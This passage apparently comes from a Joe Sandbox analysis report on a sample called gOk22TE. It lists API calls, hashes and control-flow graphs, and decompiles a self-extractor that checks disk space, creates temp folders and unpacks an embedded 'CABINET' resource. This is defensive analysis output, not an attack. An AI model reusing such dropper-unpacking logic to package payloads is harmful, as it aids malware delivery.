                                                                                                                                                                                                                                                0x010e5753
                                                                                                                                                                                                                                                0x010e574f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e572e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5864
                                                                                                                                                                                                                                                0x010e5717
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56c3
                                                                                                                                                                                                                                                0x010e56c5
                                                                                                                                                                                                                                                0x010e56c9
                                                                                                                                                                                                                                                0x010e56ce
                                                                                                                                                                                                                                                0x010e56d0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56d6
                                                                                                                                                                                                                                                0x010e56d6
                                                                                                                                                                                                                                                0x010e56d8
                                                                                                                                                                                                                                                0x010e56dd
                                                                                                                                                                                                                                                0x010e56df
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56e1
                                                                                                                                                                                                                                                0x010e56e2
                                                                                                                                                                                                                                                0x010e56e4
                                                                                                                                                                                                                                                0x010e56e6
                                                                                                                                                                                                                                                0x010e56eb
                                                                                                                                                                                                                                                0x010e56ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x010e56f3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e586c
                                                                                                                                                                                                                                                0x010e5878
                                                                                                                                                                                                                                                0x010e587e
                                                                                                                                                                                                                                                0x010e5882
                                                                                                                                                                                                                                                0x010e5883
                                                                                                                                                                                                                                                0x010e5889
                                                                                                                                                                                                                                                0x010e588e
                                                                                                                                                                                                                                                0x010e588e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5896
                                                                                                                                                                                                                                                0x010e56ed
                                                                                                                                                                                                                                                0x010e56df
                                                                                                                                                                                                                                                0x010e56d0
                                                                                                                                                                                                                                                0x010e56c1
                                                                                                                                                                                                                                                0x010e56a8
                                                                                                                                                                                                                                                0x010e565b
                                                                                                                                                                                                                                                0x010e565b
                                                                                                                                                                                                                                                0x010e565d
                                                                                                                                                                                                                                                0x010e5669
                                                                                                                                                                                                                                                0x010e5669
                                                                                                                                                                                                                                                0x010e565f
                                                                                                                                                                                                                                                0x010e565f
                                                                                                                                                                                                                                                0x010e5665
                                                                                                                                                                                                                                                0x010e5667
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5667
                                                                                                                                                                                                                                                0x010e566c
                                                                                                                                                                                                                                                0x010e5673
                                                                                                                                                                                                                                                0x010e5678
                                                                                                                                                                                                                                                0x010e567a
                                                                                                                                                                                                                                                0x010e589b
                                                                                                                                                                                                                                                0x010e589b
                                                                                                                                                                                                                                                0x010e5680
                                                                                                                                                                                                                                                0x010e5685
                                                                                                                                                                                                                                                0x010e568c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e568c
                                                                                                                                                                                                                                                0x010e567a
                                                                                                                                                                                                                                                0x010e560e
                                                                                                                                                                                                                                                0x010e5613
                                                                                                                                                                                                                                                0x010e561a
                                                                                                                                                                                                                                                0x010e5620
                                                                                                                                                                                                                                                0x010e5626
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5626
                                                                                                                                                                                                                                                0x010e55db
                                                                                                                                                                                                                                                0x010e55e0
                                                                                                                                                                                                                                                0x010e55e7
                                                                                                                                                                                                                                                0x010e55f1
                                                                                                                                                                                                                                                0x010e55f6
                                                                                                                                                                                                                                                0x010e55f6
                                                                                                                                                                                                                                                0x010e55f6
                                                                                                                                                                                                                                                0x010e58b7
                                                                                                                                                                                                                                                0x010e58c7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010E55CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010E5638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 010E564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5620
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E56B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010E571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010E5737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010E57CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010E57EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010E5802
                                                                                                                                                                                                                                                  • Part of subcall function 010E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010E2654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010E5830
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010E5878
                                                                                                                                                                                                                                                  • Part of subcall function 010E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                                                                                                                                                                                                                                  • Part of subcall function 010E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-752058184
                                                                                                                                                                                                                                                • Opcode ID: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                                                                                                                                                                                                                                                • Instruction ID: cff82595484126ce4bf40ebe1460c108c5ba3033df425f3ff7bbb180b8dc6486
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 043b7ae93401bc05e8733c1f9889c07bd3139377ff3e15e46f90ae129188c951
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A812A79B042059EDB719A379D4CBFE76EDAB64708F0408E6E5C6E7180DFB48D818B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 324 10e597d-10e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10e59dd-10e5a1b GetDiskFreeSpaceA 324->325 326 10e59bb-10e59d8 call 10e44b9 call 10e6285 324->326 328 10e5ba1-10e5bde memset call 10e6285 GetLastError FormatMessageA 325->328 329 10e5a21-10e5a4a MulDiv 325->329 341 10e5c05-10e5c14 call 10e6ce0 326->341 338 10e5be3-10e5bfc call 10e44b9 SetCurrentDirectoryA 328->338 329->328 332 10e5a50-10e5a6c GetVolumeInformationA 329->332 335 10e5a6e-10e5ab0 memset call 10e6285 GetLastError FormatMessageA 332->335 336 10e5ab5-10e5aca SetCurrentDirectoryA 332->336 335->338 340 10e5acc-10e5ad1 336->340 353 10e5c02 338->353 344 10e5ae2-10e5ae4 340->344 345 10e5ad3-10e5ad8 340->345 348 10e5ae6 344->348 349 10e5ae7-10e5af8 344->349 345->344 346 10e5ada-10e5ae0 345->346 346->340 346->344 348->349 352 10e5af9-10e5afb 349->352 354 10e5afd-10e5b03 352->354 355 10e5b05-10e5b08 352->355 356 10e5c04 353->356 354->352 354->355 357 10e5b0a-10e5b1b call 10e44b9 355->357 358 10e5b20-10e5b27 355->358 356->341 357->353 360 10e5b29-10e5b33 358->360 361 10e5b52-10e5b5b 358->361 360->361 363 10e5b35-10e5b50 360->363 364 10e5b62-10e5b6d 361->364 363->364 365 10e5b6f-10e5b74 364->365 366 10e5b76-10e5b7d 364->366 367 10e5b85 365->367 368 10e5b7f-10e5b81 366->368 369 10e5b83 366->369 370 10e5b96-10e5b9f 367->370 371 10e5b87-10e5b94 call 10e268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E010E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x10e8004; // 0x71a8563c
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x10e9124 = E010E6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E010E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x10e9a34 & 0x00000008;
							if(( *0x10e9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x10e9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x10e9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E010E268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x10e9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10e89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x10e9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E010E44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x10e9124 = E010E6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E010E44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x10e9124 = E010E6285();
					_t66 = 0;
					L33:
					return E010E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                                0x010e597d
                                                                                                                                                                                                                                                0x010e5988
                                                                                                                                                                                                                                                0x010e598f
                                                                                                                                                                                                                                                0x010e599a
                                                                                                                                                                                                                                                0x010e59a6
                                                                                                                                                                                                                                                0x010e59a8
                                                                                                                                                                                                                                                0x010e59af
                                                                                                                                                                                                                                                0x010e59b9
                                                                                                                                                                                                                                                0x010e59dd
                                                                                                                                                                                                                                                0x010e59e4
                                                                                                                                                                                                                                                0x010e59f1
                                                                                                                                                                                                                                                0x010e59fe
                                                                                                                                                                                                                                                0x010e5a0b
                                                                                                                                                                                                                                                0x010e5a13
                                                                                                                                                                                                                                                0x010e5a19
                                                                                                                                                                                                                                                0x010e5a1b
                                                                                                                                                                                                                                                0x010e5ba1
                                                                                                                                                                                                                                                0x010e5baf
                                                                                                                                                                                                                                                0x010e5bbd
                                                                                                                                                                                                                                                0x010e5bd8
                                                                                                                                                                                                                                                0x010e5bde
                                                                                                                                                                                                                                                0x010e5be3
                                                                                                                                                                                                                                                0x010e5bec
                                                                                                                                                                                                                                                0x010e5bf0
                                                                                                                                                                                                                                                0x010e5bfc
                                                                                                                                                                                                                                                0x010e5c02
                                                                                                                                                                                                                                                0x010e5c02
                                                                                                                                                                                                                                                0x010e5c02
                                                                                                                                                                                                                                                0x010e5c04
                                                                                                                                                                                                                                                0x010e5c04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5c04
                                                                                                                                                                                                                                                0x010e5a27
                                                                                                                                                                                                                                                0x010e5a3a
                                                                                                                                                                                                                                                0x010e5a46
                                                                                                                                                                                                                                                0x010e5a48
                                                                                                                                                                                                                                                0x010e5a4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5a64
                                                                                                                                                                                                                                                0x010e5a6a
                                                                                                                                                                                                                                                0x010e5a6c
                                                                                                                                                                                                                                                0x010e5abc
                                                                                                                                                                                                                                                0x010e5ac2
                                                                                                                                                                                                                                                0x010e5ac9
                                                                                                                                                                                                                                                0x010e5aca
                                                                                                                                                                                                                                                0x010e5aca
                                                                                                                                                                                                                                                0x010e5acc
                                                                                                                                                                                                                                                0x010e5acc
                                                                                                                                                                                                                                                0x010e5acf
                                                                                                                                                                                                                                                0x010e5ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ad3
                                                                                                                                                                                                                                                0x010e5ad6
                                                                                                                                                                                                                                                0x010e5ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ada
                                                                                                                                                                                                                                                0x010e5adc
                                                                                                                                                                                                                                                0x010e5add
                                                                                                                                                                                                                                                0x010e5add
                                                                                                                                                                                                                                                0x010e5ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5ae0
                                                                                                                                                                                                                                                0x010e5ae2
                                                                                                                                                                                                                                                0x010e5ae4
                                                                                                                                                                                                                                                0x010e5ae6
                                                                                                                                                                                                                                                0x010e5ae6
                                                                                                                                                                                                                                                0x010e5ae6
                                                                                                                                                                                                                                                0x010e5ae9
                                                                                                                                                                                                                                                0x010e5aeb
                                                                                                                                                                                                                                                0x010e5af0
                                                                                                                                                                                                                                                0x010e5af6
                                                                                                                                                                                                                                                0x010e5af8
                                                                                                                                                                                                                                                0x010e5af9
                                                                                                                                                                                                                                                0x010e5af9
                                                                                                                                                                                                                                                0x010e5afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5afd
                                                                                                                                                                                                                                                0x010e5aff
                                                                                                                                                                                                                                                0x010e5b00
                                                                                                                                                                                                                                                0x010e5b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b03
                                                                                                                                                                                                                                                0x010e5b05
                                                                                                                                                                                                                                                0x010e5b08
                                                                                                                                                                                                                                                0x010e5b20
                                                                                                                                                                                                                                                0x010e5b27
                                                                                                                                                                                                                                                0x010e5b52
                                                                                                                                                                                                                                                0x010e5b52
                                                                                                                                                                                                                                                0x010e5b5b
                                                                                                                                                                                                                                                0x010e5b62
                                                                                                                                                                                                                                                0x010e5b6b
                                                                                                                                                                                                                                                0x010e5b6d
                                                                                                                                                                                                                                                0x010e5b76
                                                                                                                                                                                                                                                0x010e5b7d
                                                                                                                                                                                                                                                0x010e5b83
                                                                                                                                                                                                                                                0x010e5b7f
                                                                                                                                                                                                                                                0x010e5b7f
                                                                                                                                                                                                                                                0x010e5b7f
                                                                                                                                                                                                                                                0x010e5b6f
                                                                                                                                                                                                                                                0x010e5b72
                                                                                                                                                                                                                                                0x010e5b72
                                                                                                                                                                                                                                                0x010e5b85
                                                                                                                                                                                                                                                0x010e5b98
                                                                                                                                                                                                                                                0x010e5b9e
                                                                                                                                                                                                                                                0x010e5b87
                                                                                                                                                                                                                                                0x010e5b8f
                                                                                                                                                                                                                                                0x010e5b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b85
                                                                                                                                                                                                                                                0x010e5b29
                                                                                                                                                                                                                                                0x010e5b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b35
                                                                                                                                                                                                                                                0x010e5b48
                                                                                                                                                                                                                                                0x010e5b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b4a
                                                                                                                                                                                                                                                0x010e5b0f
                                                                                                                                                                                                                                                0x010e5b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5b16
                                                                                                                                                                                                                                                0x010e5a7c
                                                                                                                                                                                                                                                0x010e5a8a
                                                                                                                                                                                                                                                0x010e5aa5
                                                                                                                                                                                                                                                0x010e5aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e59bb
                                                                                                                                                                                                                                                0x010e59c0
                                                                                                                                                                                                                                                0x010e59c7
                                                                                                                                                                                                                                                0x010e59d1
                                                                                                                                                                                                                                                0x010e59d6
                                                                                                                                                                                                                                                0x010e5c05
                                                                                                                                                                                                                                                0x010e5c14
                                                                                                                                                                                                                                                0x010e5c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010E59A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 010E59AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010E5A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 010E5A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010E5A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 010E5A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E5A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E5AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010E5BFC
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                                                                                                                                                                                                                                                • Instruction ID: 3da3caed5f4dc38d7667c7415ca2ac04e95bcd7a75a8e9d7d9878658bc68f61b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54978a5681cc419ada37a4211a6070477243edd0bccdbf3f72e4aae2af9047f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3071B5B5A0020C9FEB65DB66CC88BFB77EDEB48748F0444A9F585D7144DA358E848F60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 374 10e4fe0-10e501a call 10e468f FindResourceA LoadResource LockResource 377 10e5020-10e5027 374->377 378 10e5161-10e5163 374->378 379 10e5029-10e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 10e5057-10e505e call 10e4efd 377->380 379->380 383 10e507c-10e50b4 380->383 384 10e5060-10e5077 call 10e44b9 380->384 389 10e50e8-10e5104 call 10e44b9 383->389 390 10e50b6-10e50da 383->390 388 10e5107-10e510e 384->388 392 10e511d-10e511f 388->392 393 10e5110-10e5117 FreeResource 388->393 398 10e5106 389->398 390->398 402 10e50dc 390->402 395 10e513a-10e5141 392->395 396 10e5121-10e5127 392->396 393->392 400 10e515f 395->400 401 10e5143-10e514a 395->401 396->395 399 10e5129-10e5135 call 10e44b9 396->399 398->388 399->395 400->378 401->400 404 10e514c-10e5159 SendMessageA 401->404 405 10e50e3-10e50e6 402->405 404->400 405->389 405->398
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E010E4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x10e9144 = E010E468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x10e9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x10e8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x10e8584, 0x841), 5); // executed
				}
				_t10 = E010E4EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E010E4CA0, E010E4CC0, E010E4980, E010E4A50, E010E4AD0, E010E4B60, E010E4BC0, 1, 0x10e9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x10e9148; // 0x0
						_t24 =  *0x10e8584; // 0x0
						E010E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x10e1140, 0, E010E4CD0, 0, 0x10e9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x10e8584; // 0x0
					E010E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x10e9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x10e9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x10e91d8; // 0x0
						if(_t47 == 0) {
